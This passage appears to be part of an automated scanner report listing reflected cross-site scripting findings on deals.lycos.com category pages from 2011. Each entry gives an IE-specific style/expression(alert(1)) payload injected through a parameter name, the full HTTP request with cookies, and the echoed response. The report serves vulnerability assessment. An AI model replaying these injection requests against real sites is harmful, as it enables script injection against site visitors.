<a href="?pn=2&amp;de73e"style="x:expression(alert(1))"be0d61fbb03=1">
...[SNIP]...

1.248. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 917e1"style="x:expression(alert(1))"f0d4418b1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals?917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76685

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Shopping Deals, Online Cou
...[SNIP]...
<a href="/deals?pn=2&amp;917e1"style="x:expression(alert(1))"f0d4418b1b4=1">
...[SNIP]...

1.249. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91252"style="x:expression(alert(1))"512a2f2bd53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/cameras-167?91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77036

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Cameras Deals, Cameras Sal
...[SNIP]...
<a href="?pn=2&amp;91252"style="x:expression(alert(1))"512a2f2bd53=1">
...[SNIP]...

1.250. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22927"style%3d"x%3aexpression(alert(1))"123f49753eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22927"style="x:expression(alert(1))"123f49753eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/clothing-and-accessories-202?22927"style%3d"x%3aexpression(alert(1))"123f49753eb=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76670

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;22927"style="x:expression(alert(1))"123f49753eb=1">
...[SNIP]...

1.251. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27454"style%3d"x%3aexpression(alert(1))"160b3153f7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27454"style="x:expression(alert(1))"160b3153f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/computer-39?27454"style%3d"x%3aexpression(alert(1))"160b3153f7b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78985

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;27454"style="x:expression(alert(1))"160b3153f7b=1">
...[SNIP]...

1.252. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f182"style="x:expression(alert(1))"c14e1873a38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/digital-cameras-168?9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77375

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Digital Cameras Deals, Dig
...[SNIP]...
<a href="?pn=2&amp;9f182"style="x:expression(alert(1))"c14e1873a38=1">
...[SNIP]...

1.253. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25015"style%3d"x%3aexpression(alert(1))"9a38289e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25015"style="x:expression(alert(1))"9a38289e23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/electronics-142?25015"style%3d"x%3aexpression(alert(1))"9a38289e23=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81210

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;25015"style="x:expression(alert(1))"9a38289e23=1">
...[SNIP]...

1.254. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9863"style="x:expression(alert(1))"1f2d8a9950d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/gaming-and-toys-186?c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78449

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;c9863"style="x:expression(alert(1))"1f2d8a9950d=1">
...[SNIP]...

1.255. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43779"style="x:expression(alert(1))"b2b3b9b99d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/home-and-garden-196?43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76744

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;43779"style="x:expression(alert(1))"b2b3b9b99d2=1">
...[SNIP]...

1.256. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d43f9"style="x:expression(alert(1))"f93cc994d8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/lcd-tvs-424?d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77805

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>LCD TVs Deals, LCD TVs Sal
...[SNIP]...
<a href="?pn=2&amp;d43f9"style="x:expression(alert(1))"f93cc994d8f=1">
...[SNIP]...

1.257. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfc26"style="x:expression(alert(1))"3a91edf5df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/movies-music-books-178?dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76739

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;dfc26"style="x:expression(alert(1))"3a91edf5df2=1">
...[SNIP]...

1.258. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53ad7"style="x:expression(alert(1))"1e24dff5a28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/mp3-players-144?53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76316

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>MP3 Players Deals, MP3 Pla
...[SNIP]...
<a href="?pn=2&amp;53ad7"style="x:expression(alert(1))"1e24dff5a28=1">
...[SNIP]...

1.259. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efe58"style%3d"x%3aexpression(alert(1))"08254d1432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efe58"style="x:expression(alert(1))"08254d1432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/office-and-supplies-182?efe58"style%3d"x%3aexpression(alert(1))"08254d1432=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:22 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77239

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;efe58"style="x:expression(alert(1))"08254d1432=1">
...[SNIP]...

1.260. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8d02"style="x:expression(alert(1))"d5642dc9aea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/pc-computers-47?f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77092

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>PC Computers Deals, PC Com
...[SNIP]...
<a href="?pn=2&amp;f8d02"style="x:expression(alert(1))"d5642dc9aea=1">
...[SNIP]...

